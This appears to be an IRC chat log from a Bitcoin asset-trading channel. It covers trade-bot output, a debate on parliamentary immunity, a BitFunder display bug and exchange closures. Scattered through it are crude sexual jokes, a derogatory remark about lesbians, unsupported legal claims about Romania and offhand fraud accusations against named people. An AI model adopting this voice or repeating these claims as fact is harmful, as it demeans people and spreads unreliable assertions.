03:18:27 eh? Oct 09 03:18:32 just merge mine it Oct 09 03:18:37 you wouldn't need to mine Oct 09 03:18:38 they didn't have mm at the time yet. Oct 09 03:18:46 all the shares that will exist are created at ipo Oct 09 03:18:50 if you are luke, nobody has to know you are doing it with others hash power too Oct 09 03:19:16 well, to put another way Oct 09 03:19:28 mining is not only for printing Oct 09 03:19:44 its how tx gets confirmed Oct 09 03:19:47 no block rewards Oct 09 03:19:57 mhm Oct 09 03:20:05 i had some sort of idea about proof of work being required to post a bid/ask Oct 09 03:20:14 but i don't think it'd work in practice Oct 09 03:21:39 where is that mpex options calculator Oct 09 03:24:49 the who ?! Oct 09 03:24:51 heresy! Oct 09 03:26:18 [MPEX] [S.MPOE] 4823 @ 0.00084792 = 4.0895 BTC [+] Oct 09 03:26:26 the problem is that the smaller the fund, the greater the risk of a 51% attack Oct 09 03:26:34 and the whole thing kinda fell apart around that point Oct 09 03:27:01 started thinking about the fund operator running the equivalent of a mining pool and putting limitations on gh/s per shareholder etc etc Oct 09 03:27:04 right-o. Oct 09 03:27:10 but then i became confused Oct 09 03:27:44 & figured i'd waste everyone's time in here Oct 09 03:27:44 Error: "figured" is not a valid command. Oct 09 03:29:31 lol gribble Oct 09 03:33:25 [HAVELOCK] [B] [XBOND] 100 @ 0.00126978 = 0.127 BTC [+] Oct 09 03:34:02 http://www.cbc.ca/news/canada/newfoundland-labrador/cbc-apologizes-1.1930366 Oct 09 03:34:02 CBC Apologizes - Newfoundland & Labrador - CBC News Oct 09 03:36:06 aww Oct 09 03:38:30 [HAVELOCK] [AM1] 2 @ 1.239 = 2.478 BTC [-] Oct 09 03:57:42 Eight members of Congress were arrested during a Tuesday immigration rally on Washington, D.C.’s National Mall. Oct 09 03:57:47 heck, i didn't know you can do that. Oct 09 03:57:49 [MPEX] [S.MPOE] 5024 @ 0.00084796 = 4.2602 BTC [+] {2} Oct 09 03:58:12 in what country can you arrest mps ?! Oct 09 04:01:53 [HAVELOCK] [B] [XBOND] 191 @ 0.00126978 = 0.2425 BTC [+] Oct 09 04:04:31 in what country can't you! Oct 09 04:04:41 http://www.vancouversun.com/business/resources/Fracking+protest+ends+arrest/8807051/story.html Oct 09 04:06:04 http://m.570news.com/2013/07/16/alberta-mp-arrested-in-prostitution-sting/ Oct 09 04:06:04 Conservative Alberta MP arrested in prostitution sting | 570News Oct 09 04:06:20 TBF that last one was in a foreign country Oct 09 04:07:17 nubbins` in romania you can't arrest a mp. Oct 09 04:07:21 or in england, or in france Oct 09 04:07:27 or generally in the civilised world. wtf is this. Oct 09 04:07:38 that vancouversun.com article is actually about a sitting british mp being arrested Oct 09 04:07:44 in britain Oct 09 04:07:51 alberta ?! Oct 09 04:08:01 no Oct 09 04:08:02 http://www.vancouversun.com/business/resources/Fracking+protest+ends+arrest/8807051/story.html Oct 09 04:08:37 green party, natch Oct 09 04:08:58 "Caroline Lucas, Britain’s only Green Party member in Parliament, was led away by police from a sit-in at the gates of a drilling site near the village of Balcombe and put in a police van." Oct 09 04:09:01 not arrested. Oct 09 04:09:05 bah Oct 09 04:09:18 sure, if there's a brawl the police will come in and knock people over heads. Oct 09 04:09:23 "A British lawmaker was among more than two dozen people arrested Monday at a protest against shale gas extraction in southern England." Oct 09 04:09:29 but the only way to arrest a mp is to get permission from the respective parliament Oct 09 04:09:33 this since about 1790 Oct 09 04:09:40 the press is clueless. Oct 09 04:10:23 http://en.wikipedia.org/wiki/Parliamentary_immunity Oct 09 04:10:46 i wonder if this applies to canadia Oct 09 04:11:12 "Members of parliament may be arrested or otherwise deprived of their freedom, or face restrictions thereof, only with the permission of the desk of their assembly. " Oct 09 04:12:43 i was confusing that with parliamentary privilege Oct 09 04:13:00 http://en.wikipedia.org/wiki/Parliamentary_privilege Oct 09 04:13:34 ok, here we go Oct 09 04:13:56 Individual parliamentary privileges include: Freedom of speech, Freedom from arrest in civil action, Exemption from jury duty, Exemption from appearing as a witness, Freedom from obstruction, interference, intimidation and molestation Oct 09 04:14:05 [HAVELOCK] [AM100] 10 @ 0.01179 = 0.1179 BTC [+] {2} Oct 09 04:14:43 mpex-mktdepth.php still has sdice asks innit Oct 09 04:15:02 ha. Oct 09 04:15:06 [HAVELOCK] [B] [XBOND] 661 @ 0.00121968 = 0.8062 BTC [-] {8} Oct 09 04:15:17 "Freedom from arrest in civil actions is the oldest privilege of the House of Commons, pre‑dating freedom of speech in the United Kingdom.[191] The immunity exists because the House has the pre‑eminent claim to the attendance and service of its Members, free from restraint or intimidation particularly by means of legal arrest in civil process. It has only applied to arrest and imprisonment unde Oct 09 04:15:17 civil process and does not interfere with the administration of criminal justice." Oct 09 04:15:52 so if an mp slanders you, tough shit Oct 09 04:15:56 that last bit doesn't seem particularly accurate. Oct 09 04:15:59 if he stabs you, tough shit for him Oct 09 04:16:07 [HAVELOCK] [B] [XBOND] 4459 @ 0.00120116 = 5.356 BTC [-] {11} Oct 09 04:16:11 straight from the horse's mouth: http://www.parl.gc.ca/procedure-book-livre/Document.aspx?sbdid=abbc077a-6dd8-4fbe-a29a-3f73554e63aa&sbpid=8d1fb681-ebe9-49e7-a752-37cf494854cb Oct 09 04:16:35 well if they were arrested at some drilling site, maybe they were tresspassing Oct 09 04:17:02 "Any incident of a criminal nature in which a Member has been charged is not a matter where immunity from arrest will protect that Member." Oct 09 04:17:05 It also means that members of Parliament cannot be arrested on civil matters for statements made or acts undertaken as an MP within the grounds of the Palace of Westminster, on the condition that such statements or acts occur as part of a proceeding in Parliament—for example, as a question to the Prime Minister in the House of Commons. Oct 09 04:17:22 There is no immunity from arrest on criminal grounds, nor does the civil privilege entirely extend to the devolved administrations in Scotland or Wales. Oct 09 04:17:25 this sounds like a novel development. Oct 09 04:17:35 show me what a police state looks like Oct 09 04:17:36 maybe my memory is confused and common law never had that priviledge, Oct 09 04:17:39 but iirc it did. Oct 09 04:18:02 ok, it says right here that parliamentary privilege only covers your actions in your capacity as an MP Oct 09 04:18:16 and, in fact, an MP would have to attend a hearing for a traffic violation Oct 09 04:18:44 "If Members are charged with infractions of the law, then they must abide by the due process of law just like any other citizen. To do otherwise would be contemptuous of the justice system." Oct 09 04:18:50 sucks to be stuck in common laws systems i guess. Oct 09 04:19:04 ah, it's not that bad Oct 09 04:19:13 so when was this so interpreted ? Oct 09 04:19:26 since time immemorial, apparently Oct 09 04:19:40 "This is in accordance with the principle laid down by the British House of Commons in a conference with the House of Lords in 1641" Oct 09 04:20:44 you're telling me that in romania, an mp can rent a van and drive it through a crowd of people, killing indiscriminately, and he cannot be arrested? Oct 09 04:22:05 AMAZING COMPANY! Oct 09 04:22:06 AMAZING COMPANY! Oct 09 04:22:37 hi Oct 09 04:23:14 we were just discussing parliamentary privilege, and the limits thereof, in common-law systems of government Oct 09 04:25:39 more like british minsters tying themselves to trees Oct 09 04:25:55 or romanian ministers driving vans through crowds of people Oct 09 04:27:15 oh, yes Oct 09 04:27:24 however, it only covers MPs acting in their duties as MPs Oct 09 04:27:40 it all makes sense now. mirecea can run a btc equity exchange without getting arrested because he's a MP Oct 09 04:28:54 speaking of immunities, i have a spare router and was thinking of providing free wifi access, thoughts? Oct 09 04:29:11 bagholder: wanna buy some mining hardware? Oct 09 04:29:36 lol not really Oct 09 04:29:43 but… your name... Oct 09 04:30:02 haha i know. Oct 09 04:31:46 yeah Oct 09 04:32:02 then i was thinking i could set up a tor node on a raspi and run the wifi through that Oct 09 04:32:16 think of how dangerous this gets. if you can't run an open wifi channel because of 'terrorists', then you really can't run an encrypted one either as WEP/WPA2 have been broken. Oct 09 04:32:23 [MPEX] [S.MPOE] 4500 @ 0.0008401 = 3.7805 BTC [-] Oct 09 04:32:38 WPA2 isn't broken Oct 09 04:32:53 you can crack wpa2 Oct 09 04:33:11 hey nubbins`: https://bitcointalk.org/index.php?topic=308085.0 Oct 09 04:34:23 reddit summed up: let's solve a complex issue by selling shirts Oct 09 04:34:36 dexX7: thanks for the tip! Oct 09 04:34:42 lol yea, pankkake Oct 09 04:35:09 nubbins`: :) i'm happy to promote your "service" Oct 09 04:35:42 I didn't know. interesting Oct 09 04:35:50 i dunno, i guess a lot of this depends on key weakness... but you do see the slippery slope there though of course. Oct 09 04:36:44 hopefully someday all these laws/regulations will go away. Oct 09 04:38:29 [HAVELOCK] [B] [XBOND] 400 @ 0.00117633 = 0.4705 BTC [-] {8} Oct 09 04:40:13 nubbins` he can not be arrested. Oct 09 04:40:20 REALLY? Oct 09 04:40:31 he can be detained, but he'll walk right out of that the next day and presumably climb right into his spare van Oct 09 04:40:42 people stand for that? Oct 09 04:40:45 midnightmagic mike_c MiningBuddy mircea_popescu mius mixdio Oct 09 04:40:45 midnightmagic mike_c MiningBuddy mircea_popescu mius mixdio Oct 09 04:40:56 mike_c im not a mp! i'm THE mp. Oct 09 04:41:35 nubbins` sure. why not ? Oct 09 04:41:50 not sure if serious Oct 09 04:41:54 i am. Oct 09 04:42:33 i'm mildly shocked Oct 09 04:42:53 i'm used to elected officials at least pretending that they're not above the law Oct 09 04:43:05 listen. if you don't trust the guy don't vote him, Oct 09 04:43:21 if you imagine the damage he does comes chiefly through mowing down people in a van... you're at least naive. Oct 09 04:43:24 well, hitting people with vans wasn't part of his platform! Oct 09 04:43:37 besides, in romania you can murder someone and as long as its your first offense you usually get a suspended sentence. Oct 09 04:43:58 i guess i should retract that statement about cracking wpa2. perhaps the cryptosystem itself perhaps hasn't been broken yet. but it can be dictionary attacked, of course. Oct 09 04:44:08 o shit, nubsy, you make shirts baby ? i got something for you Oct 09 04:44:11 next they'll come after you for having weak passwords... etc. Oct 09 04:44:17 yikes Oct 09 04:44:24 just seems odd that you'd give people a free pass on being a dickhead just because of their job Oct 09 04:44:41 technically i only print the shirts, but ya know, splitting hairs here Oct 09 04:44:47 nubbins` you realise "cant be arrested" != "can't be prosecuted" right ? Oct 09 04:45:22 mod6: yes. actually France has a thing like that. you are responsible of "securing" your line Oct 09 04:45:25 never really examined that relation before, in fact Oct 09 04:45:33 arrest is this very peculiar sort of remedy. the mps are the gentry of the land, and the police state doth not get to mess with the gentry. because the gentry owns the government not the other fucking way around. Oct 09 04:45:43 (and this was only for piracy, not for terrorism etc) Oct 09 04:46:01 speaking of t-shirts http://www.npr.org/blogs/money/2013/05/15/184208123/were-making-t-shirts-lots-and-lots-of-t-shirts Oct 09 04:46:07 kickstarter still retarded Oct 09 04:46:13 thats amazing. this type of thing must die. Oct 09 04:46:28 wat, no AMAZING COMPANY?! Oct 09 04:46:29 AMAZING COMPANY! Oct 09 04:46:47 dub: i listened to something the other day about how they had such a pain in the ass transferring money Oct 09 04:46:47 i kinda like the idea. "secure your line or go to jale". Oct 09 04:47:42 next would of course be the mass jailing of microsoft. "failed to secure your product, life w/o possibility" Oct 09 04:47:46 don't let anyone steal your french fries or 50 lashes Oct 09 04:47:47 but if the tools one is given are too shitty to secure the line in the first place, im not sure you can hold someone accountable for that. aside from that, if someone wants in, they'll get in. Oct 09 04:47:50 nubbins`: yeah thats where I found it Oct 09 04:48:14 either that, or restrict the internet to only a select handful of groups/individuals. although, that wouldn't probably go over very well. Oct 09 04:49:44 mod6 buy good tools or don't have a line. Oct 09 04:49:54 gotta create the mkt for sane software somehow. Oct 09 04:50:41 [HAVELOCK] [B] [XBOND] 400 @ 0.0011521 = 0.4608 BTC [-] {4} Oct 09 04:52:43 [HAVELOCK] [B] [XBOND] 6000 @ 0.00115206 = 6.9124 BTC [-] {5} Oct 09 04:53:44 [HAVELOCK] [B] [XBOND] 2000 @ 0.00113692 = 2.2738 BTC [-] {10} Oct 09 04:54:45 [HAVELOCK] [B] [XBOND] 2362 @ 0.00108518 = 2.5632 BTC [-] {11} Oct 09 04:55:46 [HAVELOCK] [B] [XBOND] 3718 @ 0.00102066 = 3.7948 BTC [-] {15} Oct 09 04:59:36 Well, BTCT.co is out. BitFunder has a foot on the doorstep. Oct 09 04:59:42 Havelock and MPEx remain Oct 09 05:00:03 I guess Havelock will lock out US people at a minimum soon Oct 09 05:00:15 we should all lock out US people Oct 09 05:00:46 lock them in the US nuke it from orbit Oct 09 05:01:10 Only MPEx will still allow US people I guess. MPEx doesn't care/discriminate. MPEx only requires a minimum of funding (registration fee) Oct 09 05:02:20 scamlab speaks https://bitcointalk.org/index.php?topic=263445.msg3303684#msg3303684 Oct 09 05:02:47 yet MP hates everything US! Oct 09 05:03:11 not really scamcoin Oct 09 05:03:54 he's a victim too Oct 09 05:04:04 and he got paid in lolcoin shares iirc! Oct 09 05:04:52 i don't hate everything us, i fuck us chicks like weekly. Oct 09 05:05:06 corn fed? Oct 09 05:05:15 corn holed Oct 09 05:06:13 you threatening me ? Oct 09 05:06:35 just need tp for my bunghole Oct 09 05:07:15 * bagholder is now known as freshcoin << saving this for the recquord, quoted for truth, so very apt etc. Oct 09 05:07:33 lol, bagholder Oct 09 05:07:53 "I have not been able to get a hold of Sam in over a week. I have talked to TheSeven over Skype and I can't speak for him but I feel that we are reaching the point where the Labcoin team being absent is just not even close to OK anymore." Oct 09 05:07:54 tada. Oct 09 05:08:04 where's the blood sweat and tears ? Oct 09 05:08:14 where's the drunken brawly post (meanwhile edited) ? Oct 09 05:08:14 Fresh coins go this way Oct 09 05:08:19 <--- Oct 09 05:08:21 ou sont les scams d'antan Oct 09 05:08:51 lol Oct 09 05:09:48 les scams sont partout :( Oct 09 05:10:05 http://www.dailykos.com/story/2013/08/24/1233627/-NY-AG-Schneiderman-Files-40-Million-Fraud-Lawsuit-Against-Donald-Trump-his-University Oct 09 05:10:06 Daily Kos: NY AG Schneiderman Files $40 Million Fraud Lawsuit Against Donald Trump & his 'University Oct 09 05:10:07 Parti la ou il reste des gens qui ne sont pas sans le sous Oct 09 05:10:37 C'est qu'ils on eu du succes Oct 09 05:11:01 mais ou y-a-til encore des gens avec d'ecus! Oct 09 05:11:36 j'ai besoin d'une nouvelle scam maintenant! Oct 09 05:12:00 j'ai besoin d'une nouvelle arnaque maintenant ! Oct 09 05:12:02 Des ecus? Ca ca va prendre une machine a remonter dans le temps pour en trouver! Oct 09 05:12:04 check it out pankkake, we're speaking in prose! Oct 09 05:12:16 Namworld shh, it rhymes with sous. it'll have to do. Oct 09 05:12:50 ahahaha Oct 09 05:12:50 I've seen better... Oct 09 05:12:52 goodness Oct 09 05:13:12 http://www.journaldugeek.com/files/2013/02/Screenshot_1111-600x338.png Oct 09 05:13:32 sweet walkman Oct 09 05:13:55 that is not a man. Oct 09 05:14:01 you can tell by the penis and some other pixels. Oct 09 05:14:14 is there an osx eulora download somewhere? I hear that game is the shits. Oct 09 05:14:45 bloctoc no osx specific yet. there's a precompiled linux thing which maybe might work, Oct 09 05:14:59 and there's source which you might compile. Oct 09 05:15:04 [HAVELOCK] [AM100] 34 @ 0.01114971 = 0.3791 BTC [-] {3} Oct 09 05:15:22 a new version is about to come out this month tho, with a bunch of changes, so if the binary doesn't work prolly save yourself for that rather than compile old code. Oct 09 05:16:05 [HAVELOCK] [AM100] 193 @ 0.0110513 = 2.1329 BTC [-] {7} Oct 09 05:16:13 two weeks then? Oct 09 05:17:06 [HAVELOCK] [AM100] 55 @ 0.0106739 = 0.5871 BTC [-] {6} Oct 09 05:17:31 mebbe less. Oct 09 05:18:07 [HAVELOCK] [AM100] 20 @ 0.01025199 = 0.205 BTC [-] {4} Oct 09 05:21:28 that great moment when you read your own blog, discovering excellent poetry you had written years ago and meanwhile forgotten. check it : Oct 09 05:21:29 Despre-un baiat si-o fata cu inima curata Oct 09 05:21:29 Ce-i susura-n urechi, umed, cambrata Oct 09 05:21:29 Soapte de-amor si dragoste adevarata Oct 09 05:21:29 Tot ce se poate spune s-a zis macar o data. Oct 09 05:24:15 GCC included in OSX doesn't work well at all with eulora code Oct 09 05:24:31 oh, he left Oct 09 05:25:10 oh, he's back Oct 09 05:25:51 lol Oct 09 05:25:52 hi what did i miss? (if you're talking about me) Oct 09 05:26:21 I clicked on some jpg then my computer froze. probably just a coincidence. Oct 09 05:26:50 maybe it was a really cool jpg Oct 09 05:27:07 I'll never know... Oct 09 05:27:43 “As democracy is perfected, the office of the President represents, more and more closely, the inner soul of the people. On some great and glorious day, the plain folks of the land will reach their heart’s desire at last and the White House will be occupied by a downright fool and complete narcissistic moron.” Oct 09 05:27:51 anyway, bloctoc : we were talking to you, look in the log. Oct 09 05:28:18 I suppose the log in on the internet somewhere... Oct 09 05:28:30 try /topic Oct 09 05:30:08 heh Oct 09 05:30:28 what i was saying is that you very well might be able to compile eulora on OSX, but the version of GCC bundled with it won't work Oct 09 05:30:39 apparently it's some sort of weird gcc/llvm hybrid Oct 09 05:30:51 now, you can replace the onboard gcc with a proper version, but that breaks other things Oct 09 05:31:08 break all the other things! Oct 09 05:31:29 i think i did :( Oct 09 05:31:47 anyway, it's certainly possible, given enough patience Oct 09 05:33:23 [MPEX] [S.MPOE] 2650 @ 0.00084042 = 2.2271 BTC [+] Oct 09 05:37:19 thanks mp nubbins I'll steer clear of osx. Maybe I'll try eulora on gentoo. if I get around to it. Oct 09 05:41:58 united derps of derpmurica Oct 09 05:42:01 http://news.yahoo.com/us-adults-score-below-average-worldwide-test-090114407.html Oct 09 05:42:03 US adults score below average on worldwide test - Yahoo News Oct 09 05:42:32 [HAVELOCK] [CFIG] 2 @ 0.1010415 = 0.2021 BTC [-] Oct 09 05:42:35 penis size ? Oct 09 05:42:49 gullability Oct 09 05:46:04 Gullibility McGillicuddy Oct 09 05:46:36 [HAVELOCK] [CFIG] 1 @ 0.131 BTC [+] Oct 09 05:48:38 [HAVELOCK] [B] [XBOND] 104 @ 0.00105501 = 0.1097 BTC [+] Oct 09 05:51:22 it’s illegal to be gay in 78 countries, with lesbianism is banned in 49. Oct 09 05:51:25 why no 69! Oct 09 05:51:29 so close ;/ Oct 09 05:59:50 ah conversations with security folk Oct 09 05:59:50 [HAVELOCK] [AM1] 1 @ 1.239 BTC [-] Oct 09 06:00:48 how amusing and pointless you are Oct 09 06:01:31 I read that people are "rick rolling" the FBI's seized coins account with messages on block chain dust. It's got me thinking about how one would set up a p2p marketplace built entirely off messages to that FBI address. Oct 09 06:01:46 lol Oct 09 06:02:01 ahahaha Oct 09 06:02:09 this is the best colored coins idea i heard so far. Oct 09 06:02:16 if only there was some kind of virtual dice game.. we could leverage that Oct 09 06:02:41 A state highway that runs through the national park was closed after Grand Canyon officials found tourists removing barricades at overlooks along the road. Oct 09 06:02:47 dude, they should ground planes Oct 09 06:02:58 i once looked down into some natl park so i know it can be done Oct 09 06:03:59 haha Oct 09 06:07:39 i hate to see the GC closed. but fatasses hike into it everyday and can't get out so they need to emergency helicoptered out. so *shrug* Oct 09 06:09:10 http://blacren.com/wp-content/uploads/2009/03/bdk2.jpg Oct 09 06:09:15 could be solved with an intensive wild cat breeding program Oct 09 06:09:18 so for my curiosity, identify the lezzies. Oct 09 06:13:02 [HAVELOCK] [AM1] 15 @ 1.239 = 18.585 BTC [-] Oct 09 06:16:05 [MPEX] [S.MPOE] 1777 @ 0.00084042 = 1.4934 BTC [+] Oct 09 06:18:49 google images has the answer Oct 09 06:21:50 uh oh https://bitfunder.com/ ;) Oct 09 06:22:07 remarkable how little cultural/visual history people on average know Oct 09 06:22:26 that's one of the iconic moments of the 90s i'd say. Oct 09 06:22:33 I HAD 15 COINS ON THAT SITE AND ITS MY RETIREMENT FUND. OMG IM GOING TO DIE ALONE Oct 09 06:23:03 if you care about mainstream crap maybe Oct 09 06:23:06 MY SHIT IS LITERALLY FLIPPING Oct 09 06:23:07 dexX7 not news was it ? Oct 09 06:23:14 pankkake how's that mainstream !? Oct 09 06:23:36 madonna? Oct 09 06:24:07 i guess, queen of pop and all that. her lezzing out with naomi campbell and some obscure rapper hardly qualifies tho. Oct 09 06:24:25 about as subcultural, countercultural, subversive and all that as it gets. Oct 09 06:24:36 its quite simple Oct 09 06:24:44 I've seen the "sex" book and well, boring Oct 09 06:24:44 has vagina? is lesbian Oct 09 06:24:55 not for the 90s tho. Oct 09 06:25:00 at the time dub was dubbing it to ascii prons Oct 09 06:25:09 mircea_popescu: there was a short moment of "Maintenance in progress. Thank you for your patience." Oct 09 06:25:16 I certainly knocked a couple out to that book Oct 09 06:25:16 dexX7 a ok. Oct 09 06:25:43 dub i think i bought the only dozen that made that year to romania. Oct 09 06:25:46 trades were shown as executed but actually weren't and even more funny: right after that moment you saw the "share balance" of the user from whom you tried to buy/sell shares.. Oct 09 06:25:54 whoa ?! Oct 09 06:26:05 Max Hardcore was in the 90's Oct 09 06:26:11 not mainstream. Oct 09 06:26:22 max hardcore in 1992 was being about as hard to get as cocaine today. Oct 09 06:26:42 well yeah! that was my hipsterist moment Oct 09 06:26:45 i'll remind you aol was not yet online. Oct 09 06:27:01 think about it. no bitcointalk forum, no bitcointalk forumers. nowhere. Oct 09 06:27:07 pdp-10s and shit. Oct 09 06:27:23 dexX7: And for the seller its shown as if he sold it to himself Oct 09 06:27:34 ah i see Oct 09 06:27:56 and you paid the fee :D Oct 09 06:28:17 [HAVELOCK] [NEOBEE] 160 @ 0.00299997 = 0.48 BTC [+] Oct 09 06:30:12 anyway, i gotta confess i'm kinda jealous of all that btctc volume and shit. Oct 09 06:30:26 so you admit "it was real"? Oct 09 06:31:06 if you'd drop that ridicolous fee and modernized your page a bit, you could get that volume easily Oct 09 06:31:07 mircea_popescu: email coming your way Oct 09 06:33:04 would look ok with any shirt/ink colour combimation, really Oct 09 06:33:24 bright red shirt with bright blue ink would be particularly eye catching Oct 09 06:34:02 Lennix1 i make the rules. Oct 09 06:34:26 lol Oct 09 06:34:28 dexX7 i guess you miss teh sarcasm layered in there. Oct 09 06:34:34 :( Oct 09 06:35:31 everytime i asked in the past, if you were sacrastic, you denied.. so i assumed you are always talking serious :p Oct 09 06:35:32 anyway it turns out that a convincing RJ connector is actually pretty difficult to draw Oct 09 06:35:54 nubbins` i heard this a few times this week Oct 09 06:35:54 the quote is out, too late Oct 09 06:39:07 So... there's been a bug all day on BitFunder where... when you filled a ask, it made the seller buy from his own ask, and then showed you his amount of shares on the page after trade executed. Oct 09 06:39:28 lel Oct 09 06:39:29 Short: Filling ask makes seller buy from himself and then shows you seller's stats Oct 09 06:40:14 Whut? Oct 09 06:41:50 sounds pretty bad. Oct 09 06:42:45 It is. I guess Ukto will have to refund all trading fees for the day. Cause many fees where obviously not necessary. Oct 09 06:43:32 [MPEX] [S.MPOE] 3100 @ 0.00084009 = 2.6043 BTC [-] {2} Oct 09 06:45:19 mircea_popescu: and you're wondering why noone is playing with you Oct 09 06:45:26 you are very much confused. Oct 09 06:45:32 :) Oct 09 06:46:00 i am amused at the noobs that still don't grasp why their average bitcoin lifespan is less than a year. Oct 09 06:46:33 Strangely enough, so far my lifespan has only been 1.5 year Oct 09 06:46:59 i've had fun the past year Oct 09 06:47:04 Namworld makes you better than nefario & burnside so far. Oct 09 06:47:06 learned lots Oct 09 06:47:09 Considering I started early 2012, a while after learning about Bitcoin from an article about the 2011 autumn crash Oct 09 06:47:15 asa1024 that's a virtue. Oct 09 06:47:26 I learned about it so late... Oct 09 06:47:38 i just keep my mouth shut and watch what other people have to say Oct 09 06:47:59 an even greater virtue. Oct 09 06:49:30 lol looks like there will be blood 2 is gonna resolve soon Oct 09 06:49:38 bitfunder is crasssshing Oct 09 06:50:06 wait there's a 2nd one ? Oct 09 06:50:18 bitfunder vs havelock I think Oct 09 06:50:28 It's already resolved since BTCT.co... nevermind Oct 09 06:50:30 http://bitbet.us/bet/551/us-debt-ceiling-will-be-lifted-by-oct/ Oct 09 06:50:31 BitBet - US Debt ceiling will be lifted by Oct. 17th Oct 09 06:50:38 wow... someone actually thinks the ceiling gets lifted. Oct 09 06:50:38 lol, was making bets on who goes next? Oct 09 06:50:50 last year, when i didn't know much about bitcoin and browsed btctalk mostly because of "x got hacked" news, i somehow ended up on trilema (-pr did a good job, i guess) everytime and was wondering "what is this cryptic language and why is this guy using a picture of himself as background" ... interesting how everything turned out a year later. Oct 09 06:51:05 with the blatant incompetence of Ukyo/Ukto there will be no fight. Ukyo/Ukto will kill himself Oct 09 06:51:08 A dead pool? Oct 09 06:51:17 lol Ukto will kill himself Oct 09 06:51:28 a bitcoin suicide ? Oct 09 06:51:30 too soon. Oct 09 06:51:45 it always gets lifted Oct 09 06:52:03 dexX7 o cause it was romanian still at the time ? Oct 09 06:52:08 well I hope not literally, but at least he will kill bitfunder Oct 09 06:52:23 I doubt it. It's a frontend bug. He doesn't test front-end enough I guess. Nothing keeps front-end from sending bad trades at the trading engine. Oct 09 06:52:40 i think so, or i probably visited when it showed something romanian. though i wasn't that interested at this point to dig deeper. Oct 09 06:52:43 So far, no issues on the trading engine side it seems, ever Oct 09 06:53:04 and thus bitfunder is great? Oct 09 06:53:19 Ukto puts too much time on the trading engine side and not enough on the front end with user inputs. Oct 09 06:53:26 judging by the fact that this frontend knew the counterparties to trades, Oct 09 06:53:34 it seems improbable there's a frontend/trade engine separation Oct 09 06:54:03 Actually the front-end often shows wrong stuff, trades, etc Oct 09 06:54:11 but how did it know who sold when you bought ? Oct 09 06:54:12 When the back-end never actually processed Oct 09 06:55:23 My guess is the front end retrieves data from the back-end to display on the page, and send requests to the back-end which process it. The back-ends has lots of checks. Oct 09 06:55:29 Is my understanding of the system. Oct 09 06:55:56 But nothing keeps the front-end from sending incorrect trades that are valid according to back-end's data Oct 09 06:55:59 if i could see the shares of a third party, could i perhaps withdraw for a 3rd party ? Oct 09 06:56:01 or showing the wrong info Oct 09 06:56:49 Possibly... but changing page restored your own info. The front-end only loaded the other party's info to you after you executed a trade. Oct 09 06:57:12 And apparently made you buy as that other party you're buying from when inputing a buy order Oct 09 06:57:26 Thus maybe why it then returned you and loaded that party info Oct 09 06:57:35 On the trade page. Oct 09 06:58:09 i never really studied how the thing works. Oct 09 06:58:17 So the bitbet resolved double yes, other exchanges will shutter by the end of the year Oct 09 06:58:46 Well I guess after a trade, it redirects you back to the asset page and loads info for user which submited the trade. Oct 09 06:59:19 So the input submiting your trade as the user you're buying from... well then that can only possibly let you know that seller's amount of shares and that's it. Oct 09 06:59:42 As changing page loads info for your session, so your own info Oct 09 06:59:55 assets are dead get out while you can Oct 09 07:00:13 thestringpuller link to that bet ? Oct 09 07:01:26 Isn't it odd? Bitfinex still around. It's Bitcoinica 2.0 pretty much. Oct 09 07:01:56 Guess they managed to outdo their predecessor. Oct 09 07:02:13 well namworld I don't want to disillusionate you, but it seems that the only thing Ukto is doing, is watching his pile of bitcoins grow and grow Oct 09 07:02:17 Now to see how long it lasts. I'm curious Oct 09 07:02:33 outdo by time Oct 09 07:02:36 not by volume Oct 09 07:02:56 Yeah. Well volume is reasonable, but not amazing I guess? Oct 09 07:02:57 AMAZING COMPANY! Oct 09 07:03:10 ass has it Oct 09 07:03:26 Ukto has been bleeding money on lawyers lately, or so I've heard. Oct 09 07:04:05 And he'll fix the thing and refund fees, any mishaps like this costs him in credibility and trading volume. Oct 09 07:04:23 Namworld in the catatonic state it's in it can last indefinitely. icbit.se is still around too. Oct 09 07:04:35 He had trades working back in order in less than 10 minutes from being notified. Oct 09 07:05:10 was it actually going for the entire day ? Oct 09 07:05:15 Now he has to fix trading fees that were charged Oct 09 07:05:30 Well not the full day. I guess for like a few hours, not sure. Oct 09 07:05:34 Maybe like 6-8 hours Oct 09 07:05:44 couldn't have been that many trades anyone, someone'd have noticed/bitched. Oct 09 07:05:50 anyway* Oct 09 07:06:33 Bitfinex volume isn't that low. There's like 1 million usd and 2000 BTC loaned out for margin trading right now. Oct 09 07:07:05 It's bigger than icbit.se if I'm not mistaken. Oct 09 07:08:00 icbit.se volume is incredibly low AFAIK? Oct 09 07:09:23 aha finex has a new page Oct 09 07:09:48 They changed the interface. It's quite decent now. Oct 09 07:09:58 [HAVELOCK] [AM1] 10 @ 1.239 = 12.39 BTC [-] Oct 09 07:10:01 Volume is a bit bigger than before. I'd say it's decent. Oct 09 07:10:25 Well there's enough liquidity for it to work for any margin trader. Oct 09 07:10:54 I'm just too afraid to use it knowing they used Bitcoinica's source code. Oct 09 07:10:58 [HAVELOCK] [AM1] 9 @ 1.20246666 = 10.8222 BTC [-] {2} Oct 09 07:11:03 Also pretty much stole their source code... Oct 09 07:11:23 dont get zhou tonged Oct 09 07:12:09 Pretty much Oct 09 07:12:14 Still, I'm impressed Oct 09 07:12:22 They didn't get owned so far Oct 09 07:16:03 [HAVELOCK] [AM1] 1 @ 1.17 BTC [-] Oct 09 07:17:04 [HAVELOCK] [NEOBEE] 200 @ 0.00290019 = 0.58 BTC [-] {5} Oct 09 07:18:05 [HAVELOCK] [B] [XBOND] 400 @ 0.001055 = 0.422 BTC [-] {2} Oct 09 07:18:06 [MPEX] [S.MPOE] 2700 @ 0.00083991 = 2.2678 BTC [-] {2} Oct 09 07:18:11 do they have backups? Oct 09 07:18:25 I put like 12000 USD back in April selling at 150-160, made a few hundreds in interest, bought back BTC at 90-95 USD, withdrew BTC. Now I have a few hundreds USD in lending lol. Oct 09 07:18:42 Arf, forgot about that Oct 09 07:19:17 They claim daily backup and offline wallet Oct 09 07:19:27 I had forgoten btc on ozcoin until it got stolen Oct 09 07:19:33 Namworld i can confidently say their volume is < 100 btc. Oct 09 07:19:43 anyone can print any numbers they want on their own website. Oct 09 07:20:47 They have 10000 BTC according to their website stats (1 million USD + 2000 BTC) Oct 09 07:21:03 Would it really be surprising considering the scam IPOs which collected far more? Oct 09 07:21:05 story checks out Oct 09 07:21:08 [HAVELOCK] [NEOBEE] 200 @ 0.0029 = 0.58 BTC [-] Oct 09 07:22:47 go back to glbse Oct 09 07:23:25 except the scams didn't collect far more, they claimed to have collected far more. Oct 09 07:23:40 which is generally and universally a very easy claim to make. Oct 09 07:23:42 What happens with that? Oct 09 07:23:48 they did collect more 